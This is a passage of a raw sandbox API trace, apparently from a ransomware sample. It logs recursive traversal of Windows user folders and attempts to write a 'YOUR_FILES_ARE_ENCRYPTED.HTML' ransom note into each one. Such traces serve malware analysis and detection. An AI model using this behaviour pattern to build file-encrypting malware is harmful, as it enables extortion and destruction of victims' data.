ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x1000, dwReserved0=0x623e18, dwReserved1=0x626bc0, cFileName="UpdateSessionOrchestration.008.etl", cAlternateFileName="UPDATE~2.ETL")) returned 1 [0110.613] StrStrIW (lpFirst="UpdateSessionOrchestration.008.etl", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.613] wnsprintfW (in: pszDest=0x3163dd0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.008.etl") returned 72 [0110.613] PathFindExtensionW (pszPath="UpdateSessionOrchestration.008.etl") returned=".etl" [0110.613] lstrlenW (lpString=".etl") returned 4 [0110.613] PathFindExtensionW (pszPath="UpdateSessionOrchestration.008.etl") returned=".etl" [0110.613] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xf97592c3, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0xf97592c3, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0x1d9a4c7e, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0x623e18, dwReserved1=0x626bc0, cFileName="UpdateSessionOrchestration.009.etl", cAlternateFileName="UPDATE~1.ETL")) returned 1 [0110.613] StrStrIW (lpFirst="UpdateSessionOrchestration.009.etl", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.613] wnsprintfW (in: pszDest=0x3163dd0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.009.etl") returned 72 [0110.613] PathFindExtensionW (pszPath="UpdateSessionOrchestration.009.etl") returned=".etl" [0110.613] lstrlenW (lpString=".etl") returned 4 [0110.613] PathFindExtensionW (pszPath="UpdateSessionOrchestration.009.etl") returned=".etl" [0110.613] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xe7b0d97d, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xa689893c, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0xac9249a5, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x1000, dwReserved0=0x623e18, dwReserved1=0x626bc0, cFileName="UpdateUx.001.etl", cAlternateFileName="UP654C~1.ETL")) returned 1 [0110.613] StrStrIW (lpFirst="UpdateUx.001.etl", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.613] wnsprintfW (in: pszDest=0x3163dd0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\USOShared\\Logs\\UpdateUx.001.etl") returned 54 [0110.613] PathFindExtensionW (pszPath="UpdateUx.001.etl") returned=".etl" [0110.613] lstrlenW (lpString=".etl") returned 4 [0110.613] PathFindExtensionW (pszPath="UpdateUx.001.etl") returned=".etl" [0110.613] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xe7b0d97d, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xe7b0d97d, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xa690be1, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x1000, dwReserved0=0x623e18, dwReserved1=0x626bc0, cFileName="UpdateUx.002.etl", cAlternateFileName="UPDATE~3.ETL")) returned 1 [0110.613] StrStrIW (lpFirst="UpdateUx.002.etl", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.613] wnsprintfW (in: pszDest=0x3163dd0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\USOShared\\Logs\\UpdateUx.002.etl") returned 54 [0110.613] PathFindExtensionW (pszPath="UpdateUx.002.etl") returned=".etl" [0110.613] lstrlenW (lpString=".etl") returned 4 [0110.613] PathFindExtensionW (pszPath="UpdateUx.002.etl") returned=".etl" [0110.613] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb074d703, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xb074d703, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xb075118b, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x623e18, dwReserved1=0x626bc0, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0110.613] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb074d703, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xb074d703, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xb075118b, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x623e18, dwReserved1=0x626bc0, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0110.613] FindClose (in: hFindFile=0x626a38 | out: hFindFile=0x626a38) returned 1 [0110.613] wnsprintfW (in: pszDest=0x3163dd0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\USOShared\\Logs\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 67 [0110.613] GetProcessHeap () returned 0x600000 [0110.613] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d47c0 [0110.614] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\USOShared\\Logs\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\usoshared\\logs\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0110.614] GetProcessHeap () returned 0x600000 [0110.614] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d47c0 | out: hHeap=0x600000) returned 1 [0110.614] GetProcessHeap () returned 0x600000 [0110.614] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3163dd0 | out: hHeap=0x600000) returned 1 [0110.615] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb0754c6b, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xb0754c6b, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xb07586f2, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x626be6, dwReserved1=0x626bb8, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0110.615] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb0754c6b, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xb0754c6b, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xb07586f2, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x626be6, dwReserved1=0x626bb8, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0110.615] FindClose (in: hFindFile=0x626cf8 | out: hFindFile=0x626cf8) returned 1 [0110.615] wnsprintfW (in: pszDest=0x6c47b8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\USOShared\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 62 [0110.615] GetProcessHeap () returned 0x600000 [0110.615] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d47c0 [0110.615] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\USOShared\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\usoshared\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0110.615] GetProcessHeap () returned 0x600000 [0110.615] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d47c0 | out: hHeap=0x600000) returned 1 [0110.615] GetProcessHeap () returned 0x600000 [0110.615] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6c47b8 | out: hHeap=0x600000) returned 1 [0110.616] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb075e856, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xb075e856, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xb0762314, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0xa0000003, dwReserved1=0x19f200, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0110.616] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb075e856, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xb075e856, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xb0762314, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0xa0000003, dwReserved1=0x19f200, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0110.616] FindClose (in: hFindFile=0x626978 | out: hFindFile=0x626978) returned 1 [0110.616] wnsprintfW (in: pszDest=0x6b47b0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 52 [0110.616] GetProcessHeap () returned 0x600000 [0110.616] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6c47b8 [0110.617] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0110.617] GetProcessHeap () returned 0x600000 [0110.617] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6c47b8 | out: hHeap=0x600000) returned 1 [0110.617] GetProcessHeap () returned 0x600000 [0110.617] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6b47b0 | out: hHeap=0x600000) returned 1 [0110.617] FindNextFileW (in: hFindFile=0x6266b8, lpFindFileData=0x19f43c | out: lpFindFileData=0x19f43c*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0x5d599f22, ftLastAccessTime.dwHighDateTime=0x1d7005f, ftLastWriteTime.dwLowDateTime=0x5d599f22, ftLastWriteTime.dwHighDateTime=0x1d7005f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x130, cFileName="Default", cAlternateFileName="")) returned 1 [0110.617] StrStrIW (lpFirst="Default", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.617] wnsprintfW (in: pszDest=0x6dd4e0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default") returned 20 [0110.617] GetProcessHeap () returned 0x600000 [0110.617] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3163dd0 [0110.618] lstrcpyW (in: lpString1=0x3163dd0, lpString2="\\\\?\\C:\\Users\\Default" | out: lpString1="\\\\?\\C:\\Users\\Default") returned="\\\\?\\C:\\Users\\Default" [0110.618] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\Default\\*") returned="\\\\?\\C:\\Users\\Default\\*" [0110.619] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\*", lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0x5d599f22, ftLastAccessTime.dwHighDateTime=0x1d7005f, ftLastWriteTime.dwLowDateTime=0x5d599f22, ftLastWriteTime.dwHighDateTime=0x1d7005f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x19f200, cFileName=".", cAlternateFileName="")) returned 0x626bb8 [0110.620] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0x5d599f22, ftLastAccessTime.dwHighDateTime=0x1d7005f, ftLastWriteTime.dwLowDateTime=0x5d599f22, ftLastWriteTime.dwHighDateTime=0x1d7005f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x19f200, cFileName="..", cAlternateFileName="")) returned 1 [0110.620] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd9eaaa, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd9eaaa, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x19f200, cFileName="AppData", cAlternateFileName="")) returned 1 [0110.620] StrStrIW (lpFirst="AppData", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.620] wnsprintfW (in: pszDest=0x3163dd0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData") returned 28 [0110.620] GetProcessHeap () returned 0x600000 [0110.620] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3173dd8 [0110.621] lstrcpyW (in: lpString1=0x3173dd8, lpString2="\\\\?\\C:\\Users\\Default\\AppData" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData") returned="\\\\?\\C:\\Users\\Default\\AppData" [0110.621] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\AppData", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\*") returned="\\\\?\\C:\\Users\\Default\\AppData\\*" [0110.621] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\*", lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd9eaaa, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd9eaaa, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x620c3a, dwReserved1=0x620c10, cFileName=".", cAlternateFileName="")) returned 0x626778 [0110.621] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd9eaaa, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd9eaaa, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x620c3a, dwReserved1=0x620c10, cFileName="..", cAlternateFileName="")) returned 1 [0110.621] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x5d599f22, ftLastAccessTime.dwHighDateTime=0x1d7005f, ftLastWriteTime.dwLowDateTime=0x5d599f22, ftLastWriteTime.dwHighDateTime=0x1d7005f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x620c3a, dwReserved1=0x620c10, cFileName="Local", cAlternateFileName="")) returned 1 [0110.621] StrStrIW (lpFirst="Local", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.621] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local") returned 34 [0110.621] GetProcessHeap () returned 0x600000 [0110.621] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x6b47b0 [0110.622] lstrcpyW (in: lpString1=0x6b47b0, lpString2="\\\\?\\C:\\Users\\Default\\AppData\\Local" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Local") returned="\\\\?\\C:\\Users\\Default\\AppData\\Local" [0110.622] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Local", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Local\\*") returned="\\\\?\\C:\\Users\\Default\\AppData\\Local\\*" [0110.622] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\*", lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x5d599f22, ftLastAccessTime.dwHighDateTime=0x1d7005f, ftLastWriteTime.dwLowDateTime=0x5d599f22, ftLastWriteTime.dwHighDateTime=0x1d7005f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6337c8, dwReserved1=0x620c18, cFileName=".", cAlternateFileName="")) returned 0x626cf8 [0110.623] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x5d599f22, ftLastAccessTime.dwHighDateTime=0x1d7005f, ftLastWriteTime.dwLowDateTime=0x5d599f22, ftLastWriteTime.dwHighDateTime=0x1d7005f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6337c8, dwReserved1=0x620c18, cFileName="..", cAlternateFileName="")) returned 1 [0110.623] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x5d599f22, ftCreationTime.dwHighDateTime=0x1d7005f, ftLastAccessTime.dwLowDateTime=0x5d599f22, ftLastAccessTime.dwHighDateTime=0x1d7005f, ftLastWriteTime.dwLowDateTime=0x5d599f22, ftLastWriteTime.dwHighDateTime=0x1d7005f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x620c18, cFileName="Application Data", cAlternateFileName="APPLIC~1")) returned 1 [0110.623] StrStrIW (lpFirst="Application Data", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.623] wnsprintfW (in: pszDest=0x6b47b0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Application Data") returned 51 [0110.624] GetProcessHeap () returned 0x600000 [0110.624] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x6c47b8 [0110.624] lstrcpyW (in: lpString1=0x6c47b8, lpString2="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Application Data" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Application Data") returned="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Application Data" [0110.624] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Application Data", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Application Data\\*") returned="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Application Data\\*" [0110.624] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Application Data\\*", lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x626d14, ftCreationTime.dwLowDateTime=0x74447960, ftCreationTime.dwHighDateTime=0x74459310, ftLastAccessTime.dwLowDateTime=0x76800a13, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0x460046, ftLastWriteTime.dwHighDateTime=0x628c48, nFileSizeHigh=0x304, nFileSizeLow=0x20002, dwReserved0=0x628c8e, dwReserved1=0x628c48, cFileName="4", cAlternateFileName="翿")) returned 0xffffffff [0110.624] GetProcessHeap () returned 0x600000 [0110.624] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6c47b8 | out: hHeap=0x600000) returned 1 [0110.625] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x5d599f22, ftCreationTime.dwHighDateTime=0x1d7005f, ftLastAccessTime.dwLowDateTime=0x5d599f22, ftLastAccessTime.dwHighDateTime=0x1d7005f, ftLastWriteTime.dwLowDateTime=0x5d599f22, ftLastWriteTime.dwHighDateTime=0x1d7005f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x620c18, cFileName="History", cAlternateFileName="")) returned 1 [0110.625] StrStrIW (lpFirst="History", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.625] wnsprintfW (in: pszDest=0x6b47b0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\History") returned 42 [0110.625] GetProcessHeap () returned 0x600000 [0110.625] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x6c47b8 [0110.626] lstrcpyW (in: lpString1=0x6c47b8, lpString2="\\\\?\\C:\\Users\\Default\\AppData\\Local\\History" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Local\\History") returned="\\\\?\\C:\\Users\\Default\\AppData\\Local\\History" [0110.626] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Local\\History", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Local\\History\\*") returned="\\\\?\\C:\\Users\\Default\\AppData\\Local\\History\\*" [0110.626] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\History\\*", lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x626d14, ftCreationTime.dwLowDateTime=0x74447960, ftCreationTime.dwHighDateTime=0x74459310, ftLastAccessTime.dwLowDateTime=0x76800a13, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0x460046, ftLastWriteTime.dwHighDateTime=0x628c48, nFileSizeHigh=0x304, nFileSizeLow=0x20002, dwReserved0=0x628c8e, dwReserved1=0x628c48, cFileName="4", cAlternateFileName="翿")) returned 0xffffffff [0110.626] GetProcessHeap () returned 0x600000 [0110.626] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6c47b8 | out: hHeap=0x600000) returned 1 [0110.626] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x6ec87d0d, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6ec87d0d, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x620c18, cFileName="Microsoft", cAlternateFileName="MICROS~1")) returned 1 [0110.626] StrStrIW (lpFirst="Microsoft", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.626] wnsprintfW (in: pszDest=0x6b47b0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft") returned 44 [0110.626] GetProcessHeap () returned 0x600000 [0110.626] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x6c47b8 [0110.626] lstrcpyW (in: lpString1=0x6c47b8, lpString2="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft") returned="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft" [0110.626] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\*") returned="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\*" [0110.626] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\*", lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x6ec87d0d, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6ec87d0d, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x628c8e, dwReserved1=0x628c48, cFileName=".", cAlternateFileName="")) returned 0x6265b8 [0110.627] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x6ec87d0d, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6ec87d0d, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x628c8e, dwReserved1=0x628c48, cFileName="..", cAlternateFileName="")) returned 1 [0110.627] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6ec87d0d, ftCreationTime.dwHighDateTime=0x1d112f2, ftLastAccessTime.dwLowDateTime=0x6ec87d0d, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6ec87d0d, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x628c8e, dwReserved1=0x628c48, cFileName="InputPersonalization", cAlternateFileName="INPUTP~1")) returned 1 [0110.627] StrStrIW (lpFirst="InputPersonalization", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.627] wnsprintfW (in: pszDest=0x6c47b8, cchDest=32768, pszFmt="%ls\\%ls" 